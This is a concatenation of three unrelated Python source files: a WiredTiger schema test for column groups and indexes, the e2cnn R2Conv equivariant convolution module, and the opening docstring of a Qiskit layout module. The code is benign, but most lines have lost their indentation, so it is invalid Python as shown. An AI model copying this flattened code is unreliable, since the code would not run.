# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import wiredtiger, wttest
from wtscenario import check_scenarios
# test_schema02.py
# Columns, column groups, indexes
class test_schema02(wttest.WiredTigerTestCase):
"""
Test basic operations
"""
nentries = 1000
scenarios = check_scenarios([
('normal', { 'idx_config' : '' }),
('lsm', { 'idx_config' : ',type=lsm' }),
])
def expect_failure_colgroup(self, name, configstr, match):
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("colgroup:" + name, configstr), match)
def test_colgroup_after_failure(self):
# bogus formats
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main",
"key_format=Z,value_format=S"),
"/Invalid type 'Z' found in format 'Z'/")
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main",
"key_format=S,value_format=Z"),
"/Invalid type 'Z' found in format 'Z'/")
# These should succeed
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
def test_colgroup_failures(self):
# too many columns
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main", "key_format=S,"
"value_format=,columns=(a,b)"),
"/Number of columns in '\(a,b\)' does not match "
"key format 'S' plus value format ''/")
# Note: too few columns is allowed
# expect this to work
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),"
"colgroups=(c1,c2)")
# bad table name
self.expect_failure_colgroup("nomatch:c", "columns=(S1,i2)",
"/Can't create 'colgroup:nomatch:c'"
" for non-existent table 'nomatch'/")
# colgroup not declared in initial create
self.expect_failure_colgroup("main:nomatch", "columns=(S1,i2)",
"/Column group 'nomatch' not found"
" in table 'main'/")
# bad column
self.expect_failure_colgroup("main:c1", "columns=(S1,i2,bad)",
"/Column 'bad' not found/")
# TODO: no columns allowed, or not?
#self.session.create("colgroup:main:c0", "columns=()")
# key in a column group
self.expect_failure_colgroup("main:c1", "columns=(ikey,S1,i2)",
"/A column group cannot store key column"
" 'ikey' in its value/")
# expect this to work
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
# exclusive: no error message
self.expect_failure_colgroup("main:c1", "columns=(S1,i2),exclusive",
"")
# colgroup not declared in initial create
self.expect_failure_colgroup("main:c3", "columns=(S3,i4)",
"/Column group 'c3' not found in"
" table 'main'/")
# this is the last column group, but there are missing columns
self.expect_failure_colgroup("main:c2", "columns=(S1,i4)",
"/Column 'S3' in 'table:main' does not"
" appear in a column group/")
# TODO: is repartitioning column groups allowed?
# this does not raise an error
# self.expect_failure_colgroup("main:c2", "columns=(S1,S3,i4)"
# expect this to work
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
# expect these to work - each table name is a separate namespace
self.session.create("table:main2", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main2:c1", "columns=(S1,i2)")
self.session.create("colgroup:main2:c2", "columns=(S3,i4)")
def test_index(self):
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
# should be able to create colgroups before indices
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
# should be able to create indices on all key combinations
self.session.create(
"index:main:ikey", "columns=(ikey)" + self.idx_config)
self.session.create(
"index:main:Skey", "columns=(Skey)" + self.idx_config)
self.session.create(
"index:main:ikeySkey", "columns=(ikey,Skey)" + self.idx_config)
self.session.create(
"index:main:Skeyikey", "columns=(Skey,ikey)" + self.idx_config)
# should be able to create indices on all value combinations
self.session.create(
"index:main:S1", "columns=(S1)" + self.idx_config)
self.session.create(
"index:main:i2", "columns=(i2)" + self.idx_config)
self.session.create(
"index:main:i2S1", "columns=(i2,S1)" + self.idx_config)
self.session.create(
"index:main:S1i4", "columns=(S1,i4)" + self.idx_config)
# somewhat nonsensical to repeat columns within an index, but allowed
self.session.create(
"index:main:i4S3i4S1", "columns=(i4,S3,i4,S1)" + self.idx_config)
# should be able to create colgroups after indices
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
self.populate()
# should be able to create indices after populating
self.session.create(
"index:main:i2S1i4", "columns=(i2,S1,i4)" + self.idx_config)
self.check_entries()
self.check_indices()
def populate(self):
cursor = self.session.open_cursor('table:main', None, None)
for i in range(0, self.nentries):
square = i * i
cube = square * i
cursor[(i, 'key' + str(i))] = \
('val' + str(square), square, 'val' + str(cube), cube)
cursor.close()
def check_entries(self):
cursor = self.session.open_cursor('table:main', None, None)
# spot check via search
n = self.nentries
        for i in (n // 5, 0, n - 1, n - 2, 1):
cursor.set_key(i, 'key' + str(i))
square = i * i
cube = square * i
cursor.search()
(s1, i2, s3, i4) = cursor.get_values()
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
i = 0
count = 0
# then check all via cursor
cursor.reset()
for ikey, skey, s1, i2, s3, i4 in cursor:
i = ikey
square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
def check_indices(self):
# we check an index that was created before populating
cursor = self.session.open_cursor('index:main:S1i4', None, None)
count = 0
n = self.nentries
for s1key, i4key, s1, i2, s3, i4 in cursor:
i = int(i4key ** (1 / 3.0) + 0.0001) # cuberoot
#self.tty('index:main:S1i4[' + str(i) + '] (' +
# str(s1key) + ',' +
# str(i4key) + ') -> (' +
# str(s1) + ',' +
# str(i2) + ',' +
# str(s3) + ',' +
# str(i4) + ')')
self.assertEqual(s1key, s1)
self.assertEqual(i4key, i4)
ikey = i
skey = 'key' + str(i)
square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
# we check an index that was created after populating
cursor = self.session.open_cursor('index:main:i2S1i4', None, None)
count = 0
for i2key, s1key, i4key, s1, i2, s3, i4 in cursor:
i = int(i4key ** (1 / 3.0) + 0.0001) # cuberoot
#self.tty('index:main:i2S1i4[' + str(i) + '] (' +
# str(i2key) + ',' +
# str(s1key) + ',' +
# str(i4key) + ') -> (' +
# str(s1) + ',' +
# str(i2) + ',' +
# str(s3) + ',' +
# str(i4) + ')')
self.assertEqual(i2key, i2)
self.assertEqual(s1key, s1)
self.assertEqual(i4key, i4)
ikey = i
skey = 'key' + str(i)
square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
def test_colgroups(self):
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
self.populate()
self.check_entries()
if __name__ == '__main__':
wttest.run()
|
py | b404264432384bcba4b2de04ba11f434186e622d |
from torch.nn.functional import conv2d, pad
from e2cnn.nn import init
from e2cnn.nn import FieldType
from e2cnn.nn import GeometricTensor
from e2cnn.gspaces import *
from ..equivariant_module import EquivariantModule
from .basisexpansion import BasisExpansion
from .basisexpansion_blocks import BlocksBasisExpansion
from typing import Callable, Union, Tuple, List
import torch
from torch.nn import Parameter
import numpy as np
import math
__all__ = ["R2Conv"]
class R2Conv(EquivariantModule):
def __init__(self,
in_type: FieldType,
out_type: FieldType,
kernel_size: int,
padding: int = 0,
stride: int = 1,
dilation: int = 1,
padding_mode: str = 'zeros',
groups: int = 1,
bias: bool = True,
basisexpansion: str = 'blocks',
sigma: Union[List[float], float] = None,
frequencies_cutoff: Union[float, Callable[[float], int]] = None,
rings: List[float] = None,
maximum_offset: int = None,
recompute: bool = False,
basis_filter: Callable[[dict], bool] = None,
initialize: bool = True,
):
r"""
G-steerable planar convolution mapping between the input and output :class:`~e2cnn.nn.FieldType` s specified by
the parameters ``in_type`` and ``out_type``.
This operation is equivariant under the action of :math:`\R^2\rtimes G` where :math:`G` is the
:attr:`e2cnn.nn.FieldType.fibergroup` of ``in_type`` and ``out_type``.
Specifically, let :math:`\rho_\text{in}: G \to \GL{\R^{c_\text{in}}}` and
:math:`\rho_\text{out}: G \to \GL{\R^{c_\text{out}}}` be the representations specified by the input and output
field types.
Then :class:`~e2cnn.nn.R2Conv` guarantees an equivariant mapping
.. math::
\kappa \star [\mathcal{T}^\text{in}_{g,u} . f] = \mathcal{T}^\text{out}_{g,u} . [\kappa \star f] \qquad\qquad \forall g \in G, u \in \R^2
where the transformation of the input and output fields are given by
.. math::
[\mathcal{T}^\text{in}_{g,u} . f](x) &= \rho_\text{in}(g)f(g^{-1} (x - u)) \\
[\mathcal{T}^\text{out}_{g,u} . f](x) &= \rho_\text{out}(g)f(g^{-1} (x - u)) \\
The equivariance of G-steerable convolutions is guaranteed by restricting the space of convolution kernels to an
equivariant subspace.
As proven in `3D Steerable CNNs <https://arxiv.org/abs/1807.02547>`_, this parametrizes the *most general
equivariant convolutional map* between the input and output fields.
For feature fields on :math:`\R^2` (e.g. images), the complete G-steerable kernel spaces for :math:`G \leq \O2`
are derived in `General E(2)-Equivariant Steerable CNNs <https://arxiv.org/abs/1911.08251>`_.
During training, in each forward pass the module expands the basis of G-steerable kernels with learned weights
before calling :func:`torch.nn.functional.conv2d`.
When :meth:`~torch.nn.Module.eval()` is called, the filter is built with the current trained weights and stored
for future reuse such that no overhead of expanding the kernel remains.
.. warning ::
When :meth:`~torch.nn.Module.train()` is called, the attributes :attr:`~e2cnn.nn.R2Conv.filter` and
:attr:`~e2cnn.nn.R2Conv.expanded_bias` are discarded to avoid situations of mismatch with the
learnable expansion coefficients.
See also :meth:`e2cnn.nn.R2Conv.train`.
This behaviour can cause problems when storing the :meth:`~torch.nn.Module.state_dict` of a model while in
a mode and later loading it in a model with a different mode, as the attributes of the class change.
To avoid this issue, we recommend converting the model to eval mode before storing or loading the state
dictionary.
The learnable expansion coefficients of this module can be initialized with the methods in
:mod:`e2cnn.nn.init`.
By default, the weights are initialized in the constructors using :func:`~e2cnn.nn.init.generalized_he_init`.
.. warning ::
This initialization procedure can be extremely slow for wide layers.
In case initializing the model is not required (e.g. before loading the state dict of a pre-trained model)
or another initialization method is preferred (e.g. :func:`~e2cnn.nn.init.deltaorthonormal_init`), the
parameter ``initialize`` can be set to ``False`` to avoid unnecessary overhead.
The parameters ``basisexpansion``, ``sigma``, ``frequencies_cutoff``, ``rings`` and ``maximum_offset`` are
optional parameters used to control how the basis for the filters is built, how it is sampled on the filter
grid and how it is expanded to build the filter. We suggest to keep these default values.
Args:
in_type (FieldType): the type of the input field, specifying its transformation law
out_type (FieldType): the type of the output field, specifying its transformation law
kernel_size (int): the size of the (square) filter
padding (int, optional): implicit zero paddings on both sides of the input. Default: ``0``
padding_mode(str, optional): ``zeros``, ``reflect``, ``replicate`` or ``circular``. Default: ``zeros``
stride (int, optional): the stride of the kernel. Default: ``1``
dilation (int, optional): the spacing between kernel elements. Default: ``1``
groups (int, optional): number of blocked connections from input channels to output channels.
It allows depthwise convolution. When used, the input and output types need to be
divisible into ``groups`` groups, all equal to each other.
Default: ``1``.
bias (bool, optional): Whether to add a bias to the output (only to fields which contain a
trivial irrep) or not. Default ``True``
basisexpansion (str, optional): the basis expansion algorithm to use
sigma (list or float, optional): width of each ring where the bases are sampled. If only one scalar
is passed, it is used for all rings.
frequencies_cutoff (callable or float, optional): function mapping the radii of the basis elements to the
maximum frequency accepted. If a float value is passed, the maximum frequency is equal to the
radius times this factor. By default (``None``), a more complex policy is used.
rings (list, optional): radii of the rings where to sample the bases
maximum_offset (int, optional): number of additional (aliased) frequencies in the intertwiners for finite
groups. By default (``None``), all additional frequencies allowed by the frequencies cut-off
are used.
recompute (bool, optional): if ``True``, recomputes a new basis for the equivariant kernels.
By Default (``False``), it caches the basis built or reuse a cached one, if it is found.
basis_filter (callable, optional): function which takes as input a descriptor of a basis element
(as a dictionary) and returns a boolean value: whether to preserve (``True``) or discard (``False``)
the basis element. By default (``None``), no filtering is applied.
initialize (bool, optional): initialize the weights of the model. Default: ``True``
Attributes:
~.weights (torch.Tensor): the learnable parameters which are used to expand the kernel
~.filter (torch.Tensor): the convolutional kernel obtained by expanding the parameters
in :attr:`~e2cnn.nn.R2Conv.weights`
~.bias (torch.Tensor): the learnable parameters which are used to expand the bias, if ``bias=True``
~.expanded_bias (torch.Tensor): the equivariant bias which is summed to the output, obtained by expanding
the parameters in :attr:`~e2cnn.nn.R2Conv.bias`
"""
assert in_type.gspace == out_type.gspace
assert isinstance(in_type.gspace, GeneralOnR2)
super(R2Conv, self).__init__()
self.space = in_type.gspace
self.in_type = in_type
self.out_type = out_type
self.kernel_size = kernel_size
self.stride = stride
self.dilation = dilation
self.padding = padding
self.padding_mode = padding_mode
self.groups = groups
if isinstance(padding, tuple) and len(padding) == 2:
_padding = padding
elif isinstance(padding, int):
_padding = (padding, padding)
else:
raise ValueError('padding needs to be either an integer or a tuple containing two integers but {} found'.format(padding))
padding_modes = {'zeros', 'reflect', 'replicate', 'circular'}
if padding_mode not in padding_modes:
raise ValueError("padding_mode must be one of [{}], but got padding_mode='{}'".format(padding_modes, padding_mode))
self._reversed_padding_repeated_twice = tuple(x for x in reversed(_padding) for _ in range(2))
if groups > 1:
# Check the input and output classes can be split in `groups` groups, all equal to each other
# first, check that the number of fields is divisible by `groups`
assert len(in_type) % groups == 0
assert len(out_type) % groups == 0
in_size = len(in_type) // groups
out_size = len(out_type) // groups
# then, check that all groups are equal to each other, i.e. have the same types in the same order
assert all(in_type.representations[i] == in_type.representations[i % in_size] for i in range(len(in_type)))
assert all(out_type.representations[i] == out_type.representations[i % out_size] for i in range(len(out_type)))
# finally, retrieve the type associated to a single group in input.
# this type will be used to build a smaller kernel basis and a smaller filter
# as in PyTorch, to build a filter for grouped convolution, we build a filter which maps from one input
# group to all output groups. Then, PyTorch's standard convolution routine interprets this filter as `groups`
# different filters, each mapping an input group to an output group.
in_type = in_type.index_select(list(range(in_size)))
if bias:
# bias can be applied only to trivial irreps inside the representation
# to apply bias to a field we learn a bias for each trivial irreps it contains
# and, then, we transform it with the change of basis matrix to be able to apply it to the whole field
# this is equivalent to transform the field to its irreps through the inverse change of basis,
# sum the bias only to the trivial irrep and then map it back with the change of basis
# count the number of trivial irreps
trivials = 0
for r in self.out_type:
for irr in r.irreps:
if self.out_type.fibergroup.irreps[irr].is_trivial():
trivials += 1
# if there is at least 1 trivial irrep
if trivials > 0:
# matrix containing the columns of the change of basis which map from the trivial irreps to the
# field representations. This matrix allows us to map the bias defined only over the trivial irreps
# to a bias for the whole field more efficiently
bias_expansion = torch.zeros(self.out_type.size, trivials)
p, c = 0, 0
for r in self.out_type:
pi = 0
for irr in r.irreps:
irr = self.out_type.fibergroup.irreps[irr]
if irr.is_trivial():
bias_expansion[p:p+r.size, c] = torch.tensor(r.change_of_basis[:, pi])
c += 1
pi += irr.size
p += r.size
self.register_buffer("bias_expansion", bias_expansion)
self.bias = Parameter(torch.zeros(trivials), requires_grad=True)
self.register_buffer("expanded_bias", torch.zeros(out_type.size))
else:
self.bias = None
self.expanded_bias = None
else:
self.bias = None
self.expanded_bias = None
grid, basis_filter, rings, sigma, maximum_frequency = compute_basis_params(kernel_size,
frequencies_cutoff,
rings,
sigma,
dilation,
basis_filter)
# BasisExpansion: submodule which takes care of building the filter
self._basisexpansion = None
# notice that `in_type` is used instead of `self.in_type` such that it works also when `groups > 1`
if basisexpansion == 'blocks':
self._basisexpansion = BlocksBasisExpansion(in_type, out_type,
grid,
sigma=sigma,
rings=rings,
maximum_offset=maximum_offset,
maximum_frequency=maximum_frequency,
basis_filter=basis_filter,
recompute=recompute)
else:
raise ValueError('Basis Expansion algorithm "%s" not recognized' % basisexpansion)
self.weights = Parameter(torch.zeros(self.basisexpansion.dimension()), requires_grad=True)
self.register_buffer("filter", torch.zeros(out_type.size, in_type.size, kernel_size, kernel_size))
if initialize:
# by default, the weights are initialized with a generalized form of He's weight initialization
init.generalized_he_init(self.weights.data, self.basisexpansion)
@property
def basisexpansion(self) -> BasisExpansion:
r"""
Submodule which takes care of building the filter.
It uses the learnt ``weights`` to expand the kernel in the G-steerable basis and returns it in the shape
:math:`(c_\text{out}, c_\text{in}, s^2)`, where :math:`s` is the ``kernel_size``; :meth:`expand_parameters`
then reshapes it into the usual form used by conventional convolutional modules.
"""
return self._basisexpansion
def expand_parameters(self) -> Tuple[torch.Tensor, torch.Tensor]:
r"""
Expand the filter in terms of the :attr:`e2cnn.nn.R2Conv.weights` and the
expanded bias in terms of :class:`e2cnn.nn.R2Conv.bias`.
Returns:
the expanded filter and bias
"""
filter = self.basisexpansion(self.weights)
filter = filter.reshape(filter.shape[0], filter.shape[1], self.kernel_size, self.kernel_size)
if self.bias is None:
bias = None
else:
bias = self.bias_expansion @ self.bias
return filter, bias
def forward(self, input: GeometricTensor):
r"""
Convolve the input with the expanded filter and bias.
Args:
input (GeometricTensor): input feature field transforming according to ``in_type``
Returns:
output feature field transforming according to ``out_type``
"""
assert input.type == self.in_type
if not self.training:
filter = self.filter
bias = self.expanded_bias
else:
# retrieve the filter and the bias
filter, bias = self.expand_parameters()
# use it for convolution and return the result
if self.padding_mode == 'zeros':
output = conv2d(input.tensor, filter,
stride=self.stride,
padding=self.padding,
dilation=self.dilation,
groups=self.groups,
bias=bias)
else:
# pad manually with the requested mode, then convolve without additional zero padding
output = conv2d(pad(input.tensor, self._reversed_padding_repeated_twice, self.padding_mode),
filter,
stride=self.stride,
dilation=self.dilation,
groups=self.groups,
bias=bias)
return GeometricTensor(output, self.out_type)
def train(self, mode=True):
r"""
If ``mode=True``, the method sets the module in training mode and discards the :attr:`~e2cnn.nn.R2Conv.filter`
and :attr:`~e2cnn.nn.R2Conv.expanded_bias` attributes.
If ``mode=False``, it sets the module in evaluation mode. Moreover, the method builds the filter and the bias using
the current values of the trainable parameters and store them in :attr:`~e2cnn.nn.R2Conv.filter` and
:attr:`~e2cnn.nn.R2Conv.expanded_bias` such that they are not recomputed at each forward pass.
.. warning ::
This behaviour can cause problems when storing the :meth:`~torch.nn.Module.state_dict` of a model while in
a mode and later loading it in a model with a different mode, as the attributes of this class change.
To avoid this issue, we recommend converting the model to eval mode before storing or loading the state
dictionary.
Args:
mode (bool, optional): whether to set training mode (``True``) or evaluation mode (``False``).
Default: ``True``.
"""
if mode:
# TODO thoroughly check this is not causing problems
if hasattr(self, "filter"):
del self.filter
if hasattr(self, "expanded_bias"):
del self.expanded_bias
elif self.training:
# avoid re-computation of the filter and the bias on multiple consecutive calls of `.eval()`
filter, bias = self.expand_parameters()
self.register_buffer("filter", filter)
if bias is not None:
self.register_buffer("expanded_bias", bias)
else:
self.expanded_bias = None
return super(R2Conv, self).train(mode)
def evaluate_output_shape(self, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:
assert len(input_shape) == 4
assert input_shape[1] == self.in_type.size
b, c, hi, wi = input_shape
ho = math.floor((hi + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) / self.stride + 1)
wo = math.floor((wi + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) / self.stride + 1)
return b, self.out_type.size, ho, wo
def check_equivariance(self, atol: float = 0.1, rtol: float = 0.1, assertion: bool = True, verbose: bool = True):
# np.set_printoptions(precision=5, threshold=30 *self.in_type.size**2, suppress=False, linewidth=30 *self.in_type.size**2)
feature_map_size = 33
last_downsampling = 5
first_downsampling = 5
initial_size = (feature_map_size * last_downsampling - 1 + self.kernel_size) * first_downsampling
c = self.in_type.size
import matplotlib.image as mpimg
from skimage.measure import block_reduce
from skimage.transform import resize
x = mpimg.imread('../group/testimage.jpeg').transpose((2, 0, 1))[np.newaxis, 0:c, :, :]
x = resize(
x,
(x.shape[0], x.shape[1], initial_size, initial_size),
anti_aliasing=True
)
x = x / 255.0 - 0.5
if x.shape[1] < c:
to_stack = [x for i in range(c // x.shape[1])]
if c % x.shape[1] > 0:
to_stack += [x[:, :(c % x.shape[1]), ...]]
x = np.concatenate(to_stack, axis=1)
x = GeometricTensor(torch.FloatTensor(x), self.in_type)
def shrink(t: GeometricTensor, s) -> GeometricTensor:
return GeometricTensor(torch.FloatTensor(block_reduce(t.tensor.detach().numpy(), s, func=np.mean)), t.type)
errors = []
for el in self.space.testing_elements:
out1 = self(shrink(x, (1, 1, 5, 5))).transform(el).tensor.detach().numpy()
out2 = self(shrink(x.transform(el), (1, 1, 5, 5))).tensor.detach().numpy()
out1 = block_reduce(out1, (1, 1, 5, 5), func=np.mean)
out2 = block_reduce(out2, (1, 1, 5, 5), func=np.mean)
b, c, h, w = out2.shape
center_mask = np.zeros((2, h, w))
center_mask[1, :, :] = np.arange(0, w) - w / 2
center_mask[0, :, :] = np.arange(0, h) - h / 2
center_mask[0, :, :] = center_mask[0, :, :].T
center_mask = center_mask[0, :, :] ** 2 + center_mask[1, :, :] ** 2 < (h / 4) ** 2
out1 = out1[..., center_mask]
out2 = out2[..., center_mask]
out1 = out1.reshape(-1)
out2 = out2.reshape(-1)
errs = np.abs(out1 - out2)
esum = np.maximum(np.abs(out1), np.abs(out2))
esum[esum == 0.0] = 1
relerr = errs / esum
if verbose:
print(el, relerr.max(), relerr.mean(), relerr.var(), errs.max(), errs.mean(), errs.var())
tol = rtol * esum + atol
if np.any(errs > tol) and verbose:
print(out1[errs > tol])
print(out2[errs > tol])
print(tol[errs > tol])
if assertion:
assert np.all(errs < tol), 'The error found during equivariance check with element "{}" is too high: max = {}, mean = {} var ={}'.format(el, errs.max(), errs.mean(), errs.var())
errors.append((el, errs.mean()))
return errors
# init.deltaorthonormal_init(self.weights.data, self.basisexpansion)
# filter = self.basisexpansion()
# center = self.s // 2
# filter = filter[..., center, center]
# assert torch.allclose(torch.eye(filter.shape[1]), filter.t() @ filter, atol=3e-7)
def export(self):
r"""
Export this module to a normal PyTorch :class:`torch.nn.Conv2d` module and set to "eval" mode.
"""
# set to eval mode so the filter and the bias are updated with the current
# values of the weights
self.eval()
filter = self.filter
bias = self.expanded_bias
# build the PyTorch Conv2d module
has_bias = self.bias is not None
conv = torch.nn.Conv2d(self.in_type.size,
self.out_type.size,
self.kernel_size,
padding=self.padding,
stride=self.stride,
dilation=self.dilation,
groups=self.groups,
bias=has_bias)
# set the filter and the bias
conv.weight.data = filter.data
if has_bias:
conv.bias.data = bias.data
return conv
def __repr__(self):
extra_lines = []
extra_repr = self.extra_repr()
if extra_repr:
extra_lines = extra_repr.split('\n')
main_str = self._get_name() + '('
if len(extra_lines) == 1:
main_str += extra_lines[0]
else:
main_str += '\n ' + '\n '.join(extra_lines) + '\n'
main_str += ')'
return main_str
def extra_repr(self):
s = ('{in_type}, {out_type}, kernel_size={kernel_size}, stride={stride}')
if self.padding != 0 and self.padding != (0, 0):
s += ', padding={padding}'
if self.dilation != 1 and self.dilation != (1, 1):
s += ', dilation={dilation}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias is None:
s += ', bias=False'
return s.format(**self.__dict__)
def bandlimiting_filter(frequency_cutoff: Union[float, Callable[[float], float]]) -> Callable[[dict], bool]:
r"""
Returns a method which takes as input the attributes (as a dictionary) of a basis element and returns a boolean
value: whether to preserve that element (True) or not (False)
If the parameter ``frequency_cutoff`` is a scalar value, the maximum frequency allowed at a certain radius is
proportional to the radius itself. In this case, the parameter ``frequency_cutoff`` is the factor controlling this
proportionality relation.
If the parameter ``frequency_cutoff`` is a callable, it needs to take as input a radius (a scalar value) and return
the maximum frequency which can be sampled at that radius.
Args:
frequency_cutoff (float): factor controlling the bandlimiting
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
if isinstance(frequency_cutoff, float):
frequency_cutoff = lambda r, fco=frequency_cutoff: r * frequency_cutoff
def filter(attributes: dict) -> bool:
return math.fabs(attributes["frequency"]) <= frequency_cutoff(attributes["radius"])
return filter
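# Illustrative check of the returned predicate (attribute names taken from the
# function above; the numeric values are made up):
#   flt = bandlimiting_filter(2.0)
#   flt({"radius": 1.0, "frequency": 1})   # True:  |1| <= 2.0 * 1.0
#   flt({"radius": 0.5, "frequency": 3})   # False: |3| >  2.0 * 0.5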
def get_grid_coords(kernel_size: int, dilation: int = 1):
actual_size = dilation * (kernel_size -1) + 1
origin = actual_size / 2 - 0.5
points = []
for y in range(kernel_size):
y *= dilation
for x in range(kernel_size):
x *= dilation
p = (x - origin, -y + origin)
points.append(p)
points = np.array(points)
assert points.shape == (kernel_size ** 2, 2), points.shape
return points.T
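# Worked example (derived from the code above): for kernel_size=3, dilation=1 the
# origin is 1.0 and the returned 2x9 array holds the cell centres
#   (-1, 1) (0, 1) (1, 1)
#   (-1, 0) (0, 0) (1, 0)
#   (-1,-1) (0,-1) (1,-1)
# listed row by row, i.e. y grows downwards over the filter grid while the returned
# coordinates use an upward-pointing y axis.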
def compute_basis_params(kernel_size: int,
frequencies_cutoff: Union[float, Callable[[float], float]] = None,
rings: List[float] = None,
sigma: List[float] = None,
dilation: int = 1,
custom_basis_filter: Callable[[dict], bool] = None,
):
# compute the coordinates of the centers of the cells in the grid where the filter is sampled
grid = get_grid_coords(kernel_size, dilation)
max_radius = np.sqrt((grid **2).sum(1)).max()
# max_radius = kernel_size // 2
# by default, the number of rings equals half of the filter size
if rings is None:
n_rings = math.ceil(kernel_size / 2)
# if self.group.order() > 0:
# # compute the number of edges of the polygon inscribed in the filter (which is a square)
# # whose points stay inside the filter under the action of the group
# # the number of edges is lcm(group's order, 4)
# n_edges = self.group.order()
# while n_edges % 4 > 0:
# n_edges *= 2
# # the largest ring we can sample has radius equal to the circumradius of the polygon described above
# n_rings /= math.cos(math.pi/n_edges)
# n_rings = s // 2 + 1
# rings = torch.linspace(1 - s % 2, s // 2, n_rings)
rings = torch.linspace(0, (kernel_size - 1) // 2, n_rings) * dilation
rings = rings.tolist()
assert all([max_radius >= r >= 0 for r in rings])
if sigma is None:
sigma = [0.6] * (len(rings) - 1) + [0.4]
for i, r in enumerate(rings):
if r == 0.:
sigma[i] = 0.005
elif isinstance(sigma, float):
sigma = [sigma] * len(rings)
# TODO - use a string name for this setting
if frequencies_cutoff is None:
frequencies_cutoff = -1.
if isinstance(frequencies_cutoff, float):
if frequencies_cutoff == -3:
frequencies_cutoff = _manual_fco3(kernel_size // 2)
elif frequencies_cutoff == -2:
frequencies_cutoff = _manual_fco2(kernel_size // 2)
elif frequencies_cutoff == -1:
frequencies_cutoff = _manual_fco1(kernel_size // 2)
else:
frequencies_cutoff = lambda r, fco=frequencies_cutoff: fco * r
# check if the object is a callable function
assert callable(frequencies_cutoff)
maximum_frequency = int(max(frequencies_cutoff(r) for r in rings))
fco_filter = bandlimiting_filter(frequencies_cutoff)
if custom_basis_filter is not None:
basis_filter = lambda d, custom_basis_filter=custom_basis_filter, fco_filter=fco_filter: (custom_basis_filter(d) and fco_filter(d))
else:
basis_filter = fco_filter
return grid, basis_filter, rings, sigma, maximum_frequency
def _manual_fco3(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else 1 if r == max_radius else 2
return max_freq
return filter
def _manual_fco2(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else min(2 * r, 1 if r == max_radius else 2 * r - (r + 1) % 2)
return max_freq
return filter
def _manual_fco1(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else min(2 * r, 2 if r == max_radius else 2 * r - (r + 1) % 2)
return max_freq
return filter
|
py | b404273eddad603b38e35e9198bcb04d025f1338 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
A two-ways dict to represent a layout.
Layout is the relation between virtual (qu)bits and physical (qu)bits.
Virtual (qu)bits are tuples, e.g. `(QuantumRegister(3, 'qr'), 2)` or simply `qr[2]`.
Physical (qu)bits are integers.
"""
